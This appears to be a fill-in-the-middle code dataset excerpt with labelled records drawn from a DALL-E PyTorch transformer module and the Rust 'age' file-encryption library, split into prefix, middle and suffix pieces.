super().__init__()
if depth <= 18:
init_eps = 0.1
elif depth > 18 and depth <= 24:
init_eps = 1e-5
else:
init_eps = 1e-6
scale = torch.zeros(1, 1, dim).fill_(init_eps)
self.scale = nn.Parameter(scale)
self.fn = fn
def forward(self, x, **kwargs):
return self.fn(x, **kwargs) * self.scale | identifier_body |
transformer.py | from collections import deque
from collections.abc import Iterable
from functools import partial
from itertools import islice, cycle
import torch
from torch import nn, einsum
import torch.nn.functional as F
from einops import rearrange
from dalle_pytorch.reversible import ReversibleSequence, SequentialSequence
from dalle_pytorch.attention import Attention, SparseAttention, SparseConvCausalAttention, SparseAxialCausalAttention
from rotary_embedding_torch import RotaryEmbedding, broadcat
# helpers
def exists(val):
return val is not None
def default(val, d):
return val if exists(val) else d
def cast_tuple(val, depth = 1):
return val if isinstance(val, Iterable) else (val,) * depth
# classes
class DivideMax(nn.Module):
def __init__(self, dim):
super().__init__()
self.dim = dim
def forward(self, x):
maxes = x.amax(dim = self.dim, keepdim = True).detach()
return x / maxes
class NonCached(nn.Module):
"""
A wrapper for layers that don't support the inference cache themselves.
Reconstructs the full sequence before the layer and
cuts the suffix of the outputs after the layer.
"""
def __init__(self, fn):
super().__init__()
self.fn = fn
def forward(self, x, *, cache = None, cache_key = None, **kwargs):
n = x.shape[-2]
if exists(cache):
if cache_key in cache:
x = torch.cat([cache[cache_key], x], dim=-2)
cache[cache_key] = x
out = self.fn(x, **kwargs)
return out[:, -n:]
class CachedAs(nn.Module):
"""
A wrapper that defines a key for the inference cache.
"""
def __init__(self, cache_key, fn):
super().__init__()
self.cache_key = cache_key
self.fn = fn
def forward(self, x, *, cache=None, **kwargs):
return self.fn(x, cache=cache, cache_key=self.cache_key, **kwargs)
# https://arxiv.org/abs/2103.17239
class LayerScale(nn.Module):
def __init__(self, dim, depth, fn):
super().__init__()
if depth <= 18:
init_eps = 0.1
elif depth > 18 and depth <= 24:
init_eps = 1e-5
else:
init_eps = 1e-6
scale = torch.zeros(1, 1, dim).fill_(init_eps)
self.scale = nn.Parameter(scale)
self.fn = fn
def forward(self, x, **kwargs):
return self.fn(x, **kwargs) * self.scale
# layer norm
class PreNorm(nn.Module):
def __init__(self, dim, fn, sandwich = False):
super().__init__()
self.norm = nn.LayerNorm(dim)
self.norm_out = nn.LayerNorm(dim) if sandwich else nn.Identity()
self.fn = fn
def forward(self, x, **kwargs):
x = self.norm(x)
x = self.fn(x, **kwargs)
return self.norm_out(x)
# feed forward
class | (nn.Module):
def forward(self, x):
x, gates = x.chunk(2, dim = -1)
return x * F.gelu(gates)
class FeedForward(nn.Module):
def __init__(self, dim, dropout = 0., mult = 4.):
super().__init__()
self.net = nn.Sequential(
nn.Linear(dim, dim * mult * 2),
GEGLU(),
nn.Dropout(dropout),
nn.Linear(dim * mult, dim)
)
def forward(self, x, cache=None, cache_key=None):
return self.net(x)
# token shift classes
class PreShiftToken(nn.Module):
def __init__(self, fn, image_size, seq_len):
super().__init__()
self.fn = fn
self.image_size = image_size
self.seq_len = seq_len
self.img_seq_len = image_size ** 2
self.text_len = seq_len - self.img_seq_len + 1
def forward(self, x, cache=None, cache_key=None, **kwargs):
seq_len, image_size, text_len = self.seq_len, self.image_size, self.text_len
if exists(cache) and cache_key in cache:
offset = cache['offset']
assert offset >= text_len, "cached inference for text is not supported"
q = cache[cache_key]
assert isinstance(q, deque) and len(q) == image_size
x_top, x_left, *x_pass = x[:, -1].chunk(4, dim=-1)
q.append((x_top, x_left))
x_top = q.popleft()[0]
x_left = q[-2][1]
if (offset - text_len) % image_size == 0:
x_left = torch.zeros_like(x_left)
x = torch.cat((x_top, x_left, *x_pass), dim=-1)
return self.fn(x[:, None], cache=cache, **kwargs)
n = x.shape[1]
padding = seq_len - n + 1
# if sequence is shorter than the text length, no image tokens to shift
if n < text_len:
return self.fn(x, **kwargs)
# get text and image tokens
x_text, x_img = x[:, :text_len], x[:, text_len:]
x_img = F.pad(x_img, (0, 0, 0, padding))
x_img = rearrange(x_img, 'b (h w) d -> b h w d', h = image_size)
# shift 1 from the left for text tokens
x_text_shift, x_text_pass = x_text.chunk(2, dim = -1)
x_text_shift = F.pad(x_text_shift, (0, 0, 1, -1))
x_text = torch.cat((x_text_shift, x_text_pass), dim = -1)
# shift from top, left for image tokens
x_img_shift_top, x_img_shift_left, *x_img_pass = x_img.chunk(4, dim = -1)
x_img_shift_left = F.pad(x_img_shift_left, (0, 0, 1, -1))
x_img_shift_top = F.pad(x_img_shift_top, (0, 0, 0, 0, 1, -1))
x_img = torch.cat((x_img_shift_top, x_img_shift_left, *x_img_pass), dim = -1)
# merge text and image sequence back together
x_img = rearrange(x_img, 'b h w d -> b (h w) d')
x_img = x_img[:, :-padding]
x = torch.cat((x_text, x_img), dim = 1)
if exists(cache):
dummy_top, dummy_left, *_ = x[:, -1].chunk(4, dim=-1)
dummy_top, dummy_left = torch.zeros_like(dummy_top), torch.zeros_like(dummy_left)
q = deque()
x_img = x_img[:, -image_size:]
for _ in range(image_size - x_img.shape[1]):
q.append((dummy_top, dummy_left))
for i in range(x_img.shape[1]):
q.append(x_img[:, i].chunk(4, dim=-1)[:2])
cache[cache_key] = q
return self.fn(x, cache=cache, **kwargs)
# main transformer class
class Transformer(nn.Module):
def __init__(
self,
*,
dim,
depth,
seq_len,
reversible = False,
causal = True,
heads = 8,
dim_head = 64,
ff_mult = 4,
attn_dropout = 0.,
ff_dropout = 0.,
attn_types = None,
image_fmap_size = None,
sparse_attn = False,
stable = False,
sandwich_norm = False,
shift_tokens = False,
rotary_emb = True,
shared_attn_ids = None,
shared_ff_ids = None,
optimize_for_inference = False, # use cache-friendly masked attention instead of sparse one
):
super().__init__()
layers = nn.ModuleList([])
sparse_layer = cast_tuple(sparse_attn, depth)
self.seq_len = seq_len
self.image_fmap_size = image_fmap_size
attn_types = default(attn_types, ('full',))
attn_types = cast_tuple(attn_types)
attn_type_layer = islice(cycle(attn_types), depth)
shared_attn_ids = cycle(default(shared_attn_ids, range(depth)))
shared_ff_ids = cycle(default(shared_ff_ids, range(depth)))
shared_attn_layers = {}
shared_ff_layers = {}
for (ind, sparse_attn, attn_type, attn_id, ff_id) in \
zip(range(depth), sparse_layer, attn_type_layer, shared_attn_ids, shared_ff_ids):
if attn_type == 'full':
attn_class = partial(Attention, stable = stable)
elif attn_type == 'sparse':
attn_class = SparseAttention
elif attn_type == 'axial_row':
if optimize_for_inference:
attn_class = partial(Attention, stable = stable, static_mask = self._get_attention_mask(attn_type))
else:
attn_class = partial(SparseAxialCausalAttention, seq_len = seq_len, axis = 0, image_size = image_fmap_size, stable = stable)
elif attn_type == 'axial_col':
if optimize_for_inference:
attn_class = partial(Attention, stable = stable, static_mask = self._get_attention_mask(attn_type))
else:
attn_class = partial(SparseAxialCausalAttention, seq_len = seq_len, axis = 1, image_size = image_fmap_size, stable = stable)
elif attn_type == 'conv_like':
attn_class = partial(SparseConvCausalAttention, seq_len = seq_len, image_size = image_fmap_size, stable = stable)
else:
raise ValueError(f'attention type "{attn_type}" is not valid')
attn, reused_attn_type = shared_attn_layers.get(attn_id, (None, None))
if not exists(attn):
attn = attn_class(dim, causal = causal, seq_len = seq_len, heads = heads, dim_head = dim_head, dropout = attn_dropout)
shared_attn_layers[attn_id] = (attn, attn_type)
elif attn_type != reused_attn_type:
raise ValueError('attn_types do not match shared_attn_ids '
f'(ind = {ind}, attn_type = "{attn_type}", reused_attn_type = "{reused_attn_type}")')
ff = shared_ff_layers.get(ff_id)
if not exists(ff):
ff = FeedForward(dim, mult = ff_mult, dropout = ff_dropout)
shared_ff_layers[ff_id] = ff
if isinstance(attn, Attention):
attn = CachedAs(f'attn_{ind}', attn)
else:
# at the moment, other attention classes don't support cache
attn = NonCached(attn)
if shift_tokens:
attn = CachedAs(f'preshift_attn_{ind}', PreShiftToken(attn, image_size = image_fmap_size, seq_len = seq_len))
ff = CachedAs(f'preshift_ff_{ind}', PreShiftToken(ff, image_size = image_fmap_size, seq_len = seq_len))
layers.append(nn.ModuleList([
LayerScale(dim, ind + 1, PreNorm(dim, attn, sandwich = sandwich_norm)),
LayerScale(dim, ind + 1, PreNorm(dim, ff, sandwich = sandwich_norm))
]))
execute_type = ReversibleSequence if reversible else SequentialSequence
route_attn = ((True, False),) * depth
route_all = ((True, True),) * depth
attn_route_map = {'mask': route_attn, 'rotary_pos_emb': route_attn,
'cache': route_all}
self.layers = execute_type(layers, args_route = attn_route_map)
# generate positional embeddings for rotary
pos_emb = None
if rotary_emb:
rot_dim = dim_head // 3
img_seq_len = (image_fmap_size ** 2)
text_len = seq_len - img_seq_len + 1
text_pos_emb = RotaryEmbedding(dim = rot_dim)
img_axial_pos_emb = RotaryEmbedding(dim = rot_dim, freqs_for = 'pixel')
text_freqs = text_pos_emb(torch.arange(text_len))
img_to_text_freqs = text_pos_emb(torch.full((img_seq_len,), 8192)) # image is given a position far away from text
text_freqs = torch.cat((text_freqs, img_to_text_freqs), dim = 0)
img_freqs_axial = img_axial_pos_emb(torch.linspace(-1, 1, steps = image_fmap_size))
img_freqs = broadcat((rearrange(img_freqs_axial, 'i d -> i () d'), rearrange(img_freqs_axial, 'j d -> () j d')), dim = -1)
img_freqs = rearrange(img_freqs, 'h w d -> (h w) d')
text_axial_freqs = img_axial_pos_emb(torch.full((text_len,), -10.)) # text is given a position of -10 apart from the image axial positions, which is from range [-1, 1]
text_axial_freqs = torch.cat((text_axial_freqs, text_axial_freqs), dim = -1)
img_freqs = torch.cat((text_axial_freqs, img_freqs), dim = 0)
pos_emb = torch.cat((text_freqs, img_freqs), dim = -1)
pos_emb = rearrange(pos_emb, 'n d -> () n d')
self.register_buffer('pos_emb', pos_emb)
def forward(self, x, **kwargs):
return self.layers(x, rotary_pos_emb = self.pos_emb, **kwargs)
def _get_attention_mask(self, attn_type):
img_seq_len = self.image_fmap_size ** 2
text_len = self.seq_len + 1 - img_seq_len
static_mask = torch.zeros(self.seq_len, self.seq_len, dtype=torch.bool)
static_mask[:, :text_len] = True
if attn_type == 'axial_row':
for row in range(self.image_fmap_size):
begin = text_len + row * self.image_fmap_size
end = text_len + (row + 1) * self.image_fmap_size
static_mask[begin:end, begin:end] = True
elif attn_type == 'axial_col':
for col in range(self.image_fmap_size):
begin = text_len + col
static_mask[begin::self.image_fmap_size, begin::self.image_fmap_size] = True
else:
raise ValueError(f'attention type "{attn_type}" can\'t be simulated with a static mask')
return static_mask
| GEGLU | identifier_name |
transformer.py | from collections import deque
from collections.abc import Iterable
from functools import partial
from itertools import islice, cycle
import torch
from torch import nn, einsum
import torch.nn.functional as F
from einops import rearrange
from dalle_pytorch.reversible import ReversibleSequence, SequentialSequence
from dalle_pytorch.attention import Attention, SparseAttention, SparseConvCausalAttention, SparseAxialCausalAttention
from rotary_embedding_torch import RotaryEmbedding, broadcat
# helpers
def exists(val):
return val is not None
def default(val, d):
return val if exists(val) else d
def cast_tuple(val, depth = 1):
return val if isinstance(val, Iterable) else (val,) * depth
# classes
class DivideMax(nn.Module):
def __init__(self, dim):
super().__init__()
self.dim = dim
def forward(self, x):
maxes = x.amax(dim = self.dim, keepdim = True).detach()
return x / maxes
class NonCached(nn.Module):
"""
A wrapper for layers that don't support the inference cache themselves.
Reconstructs the full sequence before the layer and
cuts the suffix of the outputs after the layer.
"""
def __init__(self, fn):
super().__init__()
self.fn = fn
def forward(self, x, *, cache = None, cache_key = None, **kwargs):
n = x.shape[-2]
if exists(cache):
if cache_key in cache:
x = torch.cat([cache[cache_key], x], dim=-2)
cache[cache_key] = x
out = self.fn(x, **kwargs)
return out[:, -n:]
class CachedAs(nn.Module):
"""
A wrapper that defines a key for the inference cache.
"""
def __init__(self, cache_key, fn):
super().__init__()
self.cache_key = cache_key
self.fn = fn |
# https://arxiv.org/abs/2103.17239
class LayerScale(nn.Module):
def __init__(self, dim, depth, fn):
super().__init__()
if depth <= 18:
init_eps = 0.1
elif depth > 18 and depth <= 24:
init_eps = 1e-5
else:
init_eps = 1e-6
scale = torch.zeros(1, 1, dim).fill_(init_eps)
self.scale = nn.Parameter(scale)
self.fn = fn
def forward(self, x, **kwargs):
return self.fn(x, **kwargs) * self.scale
# layer norm
class PreNorm(nn.Module):
def __init__(self, dim, fn, sandwich = False):
super().__init__()
self.norm = nn.LayerNorm(dim)
self.norm_out = nn.LayerNorm(dim) if sandwich else nn.Identity()
self.fn = fn
def forward(self, x, **kwargs):
x = self.norm(x)
x = self.fn(x, **kwargs)
return self.norm_out(x)
# feed forward
class GEGLU(nn.Module):
def forward(self, x):
x, gates = x.chunk(2, dim = -1)
return x * F.gelu(gates)
class FeedForward(nn.Module):
def __init__(self, dim, dropout = 0., mult = 4.):
super().__init__()
self.net = nn.Sequential(
nn.Linear(dim, dim * mult * 2),
GEGLU(),
nn.Dropout(dropout),
nn.Linear(dim * mult, dim)
)
def forward(self, x, cache=None, cache_key=None):
return self.net(x)
# token shift classes
class PreShiftToken(nn.Module):
def __init__(self, fn, image_size, seq_len):
super().__init__()
self.fn = fn
self.image_size = image_size
self.seq_len = seq_len
self.img_seq_len = image_size ** 2
self.text_len = seq_len - self.img_seq_len + 1
def forward(self, x, cache=None, cache_key=None, **kwargs):
seq_len, image_size, text_len = self.seq_len, self.image_size, self.text_len
if exists(cache) and cache_key in cache:
offset = cache['offset']
assert offset >= text_len, "cached inference for text is not supported"
q = cache[cache_key]
assert isinstance(q, deque) and len(q) == image_size
x_top, x_left, *x_pass = x[:, -1].chunk(4, dim=-1)
q.append((x_top, x_left))
x_top = q.popleft()[0]
x_left = q[-2][1]
if (offset - text_len) % image_size == 0:
x_left = torch.zeros_like(x_left)
x = torch.cat((x_top, x_left, *x_pass), dim=-1)
return self.fn(x[:, None], cache=cache, **kwargs)
n = x.shape[1]
padding = seq_len - n + 1
# if sequence is shorter than the text length, no image tokens to shift
if n < text_len:
return self.fn(x, **kwargs)
# get text and image tokens
x_text, x_img = x[:, :text_len], x[:, text_len:]
x_img = F.pad(x_img, (0, 0, 0, padding))
x_img = rearrange(x_img, 'b (h w) d -> b h w d', h = image_size)
# shift 1 from the left for text tokens
x_text_shift, x_text_pass = x_text.chunk(2, dim = -1)
x_text_shift = F.pad(x_text_shift, (0, 0, 1, -1))
x_text = torch.cat((x_text_shift, x_text_pass), dim = -1)
# shift from top, left for image tokens
x_img_shift_top, x_img_shift_left, *x_img_pass = x_img.chunk(4, dim = -1)
x_img_shift_left = F.pad(x_img_shift_left, (0, 0, 1, -1))
x_img_shift_top = F.pad(x_img_shift_top, (0, 0, 0, 0, 1, -1))
x_img = torch.cat((x_img_shift_top, x_img_shift_left, *x_img_pass), dim = -1)
# merge text and image sequence back together
x_img = rearrange(x_img, 'b h w d -> b (h w) d')
x_img = x_img[:, :-padding]
x = torch.cat((x_text, x_img), dim = 1)
if exists(cache):
dummy_top, dummy_left, *_ = x[:, -1].chunk(4, dim=-1)
dummy_top, dummy_left = torch.zeros_like(dummy_top), torch.zeros_like(dummy_left)
q = deque()
x_img = x_img[:, -image_size:]
for _ in range(image_size - x_img.shape[1]):
q.append((dummy_top, dummy_left))
for i in range(x_img.shape[1]):
q.append(x_img[:, i].chunk(4, dim=-1)[:2])
cache[cache_key] = q
return self.fn(x, cache=cache, **kwargs)
# main transformer class
class Transformer(nn.Module):
def __init__(
self,
*,
dim,
depth,
seq_len,
reversible = False,
causal = True,
heads = 8,
dim_head = 64,
ff_mult = 4,
attn_dropout = 0.,
ff_dropout = 0.,
attn_types = None,
image_fmap_size = None,
sparse_attn = False,
stable = False,
sandwich_norm = False,
shift_tokens = False,
rotary_emb = True,
shared_attn_ids = None,
shared_ff_ids = None,
optimize_for_inference = False, # use cache-friendly masked attention instead of sparse one
):
super().__init__()
layers = nn.ModuleList([])
sparse_layer = cast_tuple(sparse_attn, depth)
self.seq_len = seq_len
self.image_fmap_size = image_fmap_size
attn_types = default(attn_types, ('full',))
attn_types = cast_tuple(attn_types)
attn_type_layer = islice(cycle(attn_types), depth)
shared_attn_ids = cycle(default(shared_attn_ids, range(depth)))
shared_ff_ids = cycle(default(shared_ff_ids, range(depth)))
shared_attn_layers = {}
shared_ff_layers = {}
for (ind, sparse_attn, attn_type, attn_id, ff_id) in \
zip(range(depth), sparse_layer, attn_type_layer, shared_attn_ids, shared_ff_ids):
if attn_type == 'full':
attn_class = partial(Attention, stable = stable)
elif attn_type == 'sparse':
attn_class = SparseAttention
elif attn_type == 'axial_row':
if optimize_for_inference:
attn_class = partial(Attention, stable = stable, static_mask = self._get_attention_mask(attn_type))
else:
attn_class = partial(SparseAxialCausalAttention, seq_len = seq_len, axis = 0, image_size = image_fmap_size, stable = stable)
elif attn_type == 'axial_col':
if optimize_for_inference:
attn_class = partial(Attention, stable = stable, static_mask = self._get_attention_mask(attn_type))
else:
attn_class = partial(SparseAxialCausalAttention, seq_len = seq_len, axis = 1, image_size = image_fmap_size, stable = stable)
elif attn_type == 'conv_like':
attn_class = partial(SparseConvCausalAttention, seq_len = seq_len, image_size = image_fmap_size, stable = stable)
else:
raise ValueError(f'attention type "{attn_type}" is not valid')
attn, reused_attn_type = shared_attn_layers.get(attn_id, (None, None))
if not exists(attn):
attn = attn_class(dim, causal = causal, seq_len = seq_len, heads = heads, dim_head = dim_head, dropout = attn_dropout)
shared_attn_layers[attn_id] = (attn, attn_type)
elif attn_type != reused_attn_type:
raise ValueError('attn_types do not match shared_attn_ids '
f'(ind = {ind}, attn_type = "{attn_type}", reused_attn_type = "{reused_attn_type}")')
ff = shared_ff_layers.get(ff_id)
if not exists(ff):
ff = FeedForward(dim, mult = ff_mult, dropout = ff_dropout)
shared_ff_layers[ff_id] = ff
if isinstance(attn, Attention):
attn = CachedAs(f'attn_{ind}', attn)
else:
# at the moment, other attention classes don't support cache
attn = NonCached(attn)
if shift_tokens:
attn = CachedAs(f'preshift_attn_{ind}', PreShiftToken(attn, image_size = image_fmap_size, seq_len = seq_len))
ff = CachedAs(f'preshift_ff_{ind}', PreShiftToken(ff, image_size = image_fmap_size, seq_len = seq_len))
layers.append(nn.ModuleList([
LayerScale(dim, ind + 1, PreNorm(dim, attn, sandwich = sandwich_norm)),
LayerScale(dim, ind + 1, PreNorm(dim, ff, sandwich = sandwich_norm))
]))
execute_type = ReversibleSequence if reversible else SequentialSequence
route_attn = ((True, False),) * depth
route_all = ((True, True),) * depth
attn_route_map = {'mask': route_attn, 'rotary_pos_emb': route_attn,
'cache': route_all}
self.layers = execute_type(layers, args_route = attn_route_map)
# generate positional embeddings for rotary
pos_emb = None
if rotary_emb:
rot_dim = dim_head // 3
img_seq_len = (image_fmap_size ** 2)
text_len = seq_len - img_seq_len + 1
text_pos_emb = RotaryEmbedding(dim = rot_dim)
img_axial_pos_emb = RotaryEmbedding(dim = rot_dim, freqs_for = 'pixel')
text_freqs = text_pos_emb(torch.arange(text_len))
img_to_text_freqs = text_pos_emb(torch.full((img_seq_len,), 8192)) # image is given a position far away from text
text_freqs = torch.cat((text_freqs, img_to_text_freqs), dim = 0)
img_freqs_axial = img_axial_pos_emb(torch.linspace(-1, 1, steps = image_fmap_size))
img_freqs = broadcat((rearrange(img_freqs_axial, 'i d -> i () d'), rearrange(img_freqs_axial, 'j d -> () j d')), dim = -1)
img_freqs = rearrange(img_freqs, 'h w d -> (h w) d')
text_axial_freqs = img_axial_pos_emb(torch.full((text_len,), -10.)) # text is given a position of -10 apart from the image axial positions, which is from range [-1, 1]
text_axial_freqs = torch.cat((text_axial_freqs, text_axial_freqs), dim = -1)
img_freqs = torch.cat((text_axial_freqs, img_freqs), dim = 0)
pos_emb = torch.cat((text_freqs, img_freqs), dim = -1)
pos_emb = rearrange(pos_emb, 'n d -> () n d')
self.register_buffer('pos_emb', pos_emb)
def forward(self, x, **kwargs):
return self.layers(x, rotary_pos_emb = self.pos_emb, **kwargs)
def _get_attention_mask(self, attn_type):
img_seq_len = self.image_fmap_size ** 2
text_len = self.seq_len + 1 - img_seq_len
static_mask = torch.zeros(self.seq_len, self.seq_len, dtype=torch.bool)
static_mask[:, :text_len] = True
if attn_type == 'axial_row':
for row in range(self.image_fmap_size):
begin = text_len + row * self.image_fmap_size
end = text_len + (row + 1) * self.image_fmap_size
static_mask[begin:end, begin:end] = True
elif attn_type == 'axial_col':
for col in range(self.image_fmap_size):
begin = text_len + col
static_mask[begin::self.image_fmap_size, begin::self.image_fmap_size] = True
else:
raise ValueError(f'attention type "{attn_type}" can\'t be simulated with a static mask')
return static_mask |
def forward(self, x, *, cache=None, **kwargs):
return self.fn(x, cache=cache, cache_key=self.cache_key, **kwargs) | random_line_split |
lib.rs | //! *Library for encrypting and decrypting age files*
//!
//! This crate implements file encryption according to the [age-encryption.org/v1]
//! specification. It generates and consumes encrypted files that are compatible with the
//! [rage] CLI tool, as well as the reference [Go] implementation.
//!
//! The encryption and decryption APIs are provided by [`Encryptor`] and [`Decryptor`].
//! There are several ways to use these:
//! - For most cases (including programmatic usage), use [`Encryptor::with_recipients`]
//! with [`x25519::Recipient`], and [`Decryptor`] with [`x25519::Identity`].
//! - APIs are available for passphrase-based encryption and decryption. These should
//! only be used with passphrases that were provided by (or generated for) a human.
//! - For compatibility with existing SSH keys, enable the `ssh` feature flag, and use
//! [`ssh::Recipient`] and [`ssh::Identity`].
//!
//! Age-encrypted files are binary and non-malleable. To encode them as text, use the
//! wrapping readers and writers in the [`armor`] module, behind the `armor` feature flag.
//!
//! *Caution*: all crate versions prior to 1.0 are beta releases for **testing purposes
//! only**.
//!
//! [age-encryption.org/v1]: https://age-encryption.org/v1
//! [rage]: https://crates.io/crates/rage
//! [Go]: https://filippo.io/age
//!
//! # Examples
//!
//! ## Recipient-based encryption
//!
//! ```
//! use std::io::{Read, Write};
//! use std::iter;
//!
//! # fn run_main() -> Result<(), ()> {
//! let key = age::x25519::Identity::generate();
//! let pubkey = key.to_public();
//!
//! let plaintext = b"Hello world!";
//!
//! // Encrypt the plaintext to a ciphertext...
//! # fn encrypt(pubkey: age::x25519::Recipient, plaintext: &[u8]) -> Result<Vec<u8>, age::EncryptError> {
//! let encrypted = {
//! let encryptor = age::Encryptor::with_recipients(vec![Box::new(pubkey)])
//! .expect("we provided a recipient");
//!
//! let mut encrypted = vec![];
//! let mut writer = encryptor.wrap_output(&mut encrypted)?;
//! writer.write_all(plaintext)?;
//! writer.finish()?;
//!
//! encrypted
//! };
//! # Ok(encrypted)
//! # }
//!
//! // ... and decrypt the obtained ciphertext to the plaintext again.
//! # fn decrypt(key: age::x25519::Identity, encrypted: Vec<u8>) -> Result<Vec<u8>, age::DecryptError> {
//! let decrypted = {
//! let decryptor = match age::Decryptor::new(&encrypted[..])? {
//! age::Decryptor::Recipients(d) => d,
//! _ => unreachable!(),
//! };
//!
//! let mut decrypted = vec![];
//! let mut reader = decryptor.decrypt(iter::once(&key as &dyn age::Identity))?;
//! reader.read_to_end(&mut decrypted);
//!
//! decrypted
//! };
//! # Ok(decrypted)
//! # }
//! # let decrypted = decrypt(
//! # key,
//! # encrypt(pubkey, &plaintext[..]).map_err(|_| ())?
//! # ).map_err(|_| ())?;
//!
//! assert_eq!(decrypted, plaintext);
//! # Ok(())
//! # }
//!
//! # run_main().unwrap();
//! ```
//!
//! ## Passphrase-based encryption
//!
//! ```
//! use age::secrecy::Secret;
//! use std::io::{Read, Write};
//!
//! # fn run_main() -> Result<(), ()> { | //! let passphrase = "this is not a good passphrase";
//!
//! // Encrypt the plaintext to a ciphertext using the passphrase...
//! # fn encrypt(passphrase: &str, plaintext: &[u8]) -> Result<Vec<u8>, age::EncryptError> {
//! let encrypted = {
//! let encryptor = age::Encryptor::with_user_passphrase(Secret::new(passphrase.to_owned()));
//!
//! let mut encrypted = vec![];
//! let mut writer = encryptor.wrap_output(&mut encrypted)?;
//! writer.write_all(plaintext)?;
//! writer.finish()?;
//!
//! encrypted
//! };
//! # Ok(encrypted)
//! # }
//!
//! // ... and decrypt the ciphertext to the plaintext again using the same passphrase.
//! # fn decrypt(passphrase: &str, encrypted: Vec<u8>) -> Result<Vec<u8>, age::DecryptError> {
//! let decrypted = {
//! let decryptor = match age::Decryptor::new(&encrypted[..])? {
//! age::Decryptor::Passphrase(d) => d,
//! _ => unreachable!(),
//! };
//!
//! let mut decrypted = vec![];
//! let mut reader = decryptor.decrypt(&Secret::new(passphrase.to_owned()), None)?;
//! reader.read_to_end(&mut decrypted);
//!
//! decrypted
//! };
//! # Ok(decrypted)
//! # }
//! # let decrypted = decrypt(
//! # passphrase,
//! # encrypt(passphrase, &plaintext[..]).map_err(|_| ())?
//! # ).map_err(|_| ())?;
//!
//! assert_eq!(decrypted, plaintext);
//! # Ok(())
//! # }
//! # run_main().unwrap();
//! ```
#![cfg_attr(docsrs, feature(doc_cfg))]
#![forbid(unsafe_code)]
// Catch documentation errors caused by code changes.
#![deny(rustdoc::broken_intra_doc_links)]
#![deny(missing_docs)]
// Re-export crates that are used in our public API.
pub use age_core::secrecy;
mod error;
mod format;
mod identity;
mod keys;
mod primitives;
mod protocol;
mod util;
pub use error::{DecryptError, EncryptError};
pub use identity::{IdentityFile, IdentityFileEntry};
pub use primitives::stream;
pub use protocol::{decryptor, Decryptor, Encryptor};
#[cfg(feature = "armor")]
pub use primitives::armor;
#[cfg(feature = "cli-common")]
#[cfg_attr(docsrs, doc(cfg(feature = "cli-common")))]
pub mod cli_common;
mod i18n;
pub use i18n::localizer;
//
// Identity types
//
pub mod encrypted;
mod scrypt;
pub mod x25519;
#[cfg(feature = "plugin")]
#[cfg_attr(docsrs, doc(cfg(feature = "plugin")))]
pub mod plugin;
#[cfg(feature = "ssh")]
#[cfg_attr(docsrs, doc(cfg(feature = "ssh")))]
pub mod ssh;
use age_core::{
format::{FileKey, Stanza},
secrecy::SecretString,
};
/// A private key or other value that can unwrap an opaque file key from a recipient
/// stanza.
pub trait Identity {
/// Attempts to unwrap the given stanza with this identity.
///
/// This method is part of the `Identity` trait to expose age's [one joint] for
/// external implementations. You should not need to call this directly; instead, pass
/// identities to [`RecipientsDecryptor::decrypt`].
///
/// Returns:
/// - `Some(Ok(file_key))` on success.
/// - `Some(Err(e))` if a decryption error occurs.
/// - `None` if the recipient stanza does not match this key.
///
/// [one joint]: https://www.imperialviolet.org/2016/05/16/agility.html
/// [`RecipientsDecryptor::decrypt`]: protocol::decryptor::RecipientsDecryptor::decrypt
fn unwrap_stanza(&self, stanza: &Stanza) -> Option<Result<FileKey, DecryptError>>;
/// Attempts to unwrap any of the given stanzas, which are assumed to come from the
/// same age file header, and therefore contain the same file key.
///
/// This method is part of the `Identity` trait to expose age's [one joint] for
/// external implementations. You should not need to call this directly; instead, pass
/// identities to [`RecipientsDecryptor::decrypt`].
///
/// Returns:
/// - `Some(Ok(file_key))` on success.
/// - `Some(Err(e))` if a decryption error occurs.
/// - `None` if none of the recipient stanzas match this identity.
///
/// [one joint]: https://www.imperialviolet.org/2016/05/16/agility.html
/// [`RecipientsDecryptor::decrypt`]: protocol::decryptor::RecipientsDecryptor::decrypt
fn unwrap_stanzas(&self, stanzas: &[Stanza]) -> Option<Result<FileKey, DecryptError>> {
stanzas.iter().find_map(|stanza| self.unwrap_stanza(stanza))
}
}
/// A public key or other value that can wrap an opaque file key to a recipient stanza.
///
/// Implementations of this trait might represent more than one recipient.
pub trait Recipient {
/// Wraps the given file key, returning stanzas to be placed in an age file header.
///
/// Implementations MUST NOT return more than one stanza per "actual recipient".
///
/// This method is part of the `Recipient` trait to expose age's [one joint] for
/// external implementations. You should not need to call this directly; instead, pass
/// recipients to [`Encryptor::with_recipients`].
///
/// [one joint]: https://www.imperialviolet.org/2016/05/16/agility.html
fn wrap_file_key(&self, file_key: &FileKey) -> Result<Vec<Stanza>, EncryptError>;
}
/// Callbacks that might be triggered during encryption or decryption.
///
/// Structs that implement this trait should be given directly to the individual
/// `Recipient` or `Identity` implementations that require them.
pub trait Callbacks: Clone + Send + Sync + 'static {
/// Shows a message to the user.
///
/// This can be used to prompt the user to take some physical action, such as
/// inserting a hardware key.
fn display_message(&self, message: &str);
/// Requests that the user provides confirmation for some action.
///
/// This can be used to, for example, request that a hardware key the plugin wants to
/// try either be plugged in, or skipped.
///
/// - `message` is the request or call-to-action to be displayed to the user.
/// - `yes_string` and (optionally) `no_string` will be displayed on buttons or next
/// to selection options in the user's UI.
///
/// Returns:
/// - `Some(true)` if the user selected the option marked with `yes_string`.
/// - `Some(false)` if the user selected the option marked with `no_string` (or the
/// default negative confirmation label).
/// - `None` if the confirmation request could not be given to the user (for example,
/// if there is no UI for displaying messages).
fn confirm(&self, message: &str, yes_string: &str, no_string: Option<&str>) -> Option<bool>;
/// Requests non-private input from the user.
///
/// To request private inputs, use [`Callbacks::request_passphrase`].
fn request_public_string(&self, description: &str) -> Option<String>;
/// Requests a passphrase to decrypt a key.
fn request_passphrase(&self, description: &str) -> Option<SecretString>;
}
/// Helper for fuzzing the Header parser and serializer.
#[cfg(fuzzing)]
pub fn fuzz_header(data: &[u8]) {
if let Ok(header) = format::Header::read(data) {
let mut buf = Vec::with_capacity(data.len());
header.write(&mut buf).expect("can write header");
assert_eq!(&buf[..], &data[..buf.len()]);
}
} | //! let plaintext = b"Hello world!"; | random_line_split |
lib.rs | //! *Library for encrypting and decrypting age files*
//!
//! This crate implements file encryption according to the [age-encryption.org/v1]
//! specification. It generates and consumes encrypted files that are compatible with the
//! [rage] CLI tool, as well as the reference [Go] implementation.
//!
//! The encryption and decryption APIs are provided by [`Encryptor`] and [`Decryptor`].
//! There are several ways to use these:
//! - For most cases (including programmatic usage), use [`Encryptor::with_recipients`]
//! with [`x25519::Recipient`], and [`Decryptor`] with [`x25519::Identity`].
//! - APIs are available for passphrase-based encryption and decryption. These should
//! only be used with passphrases that were provided by (or generated for) a human.
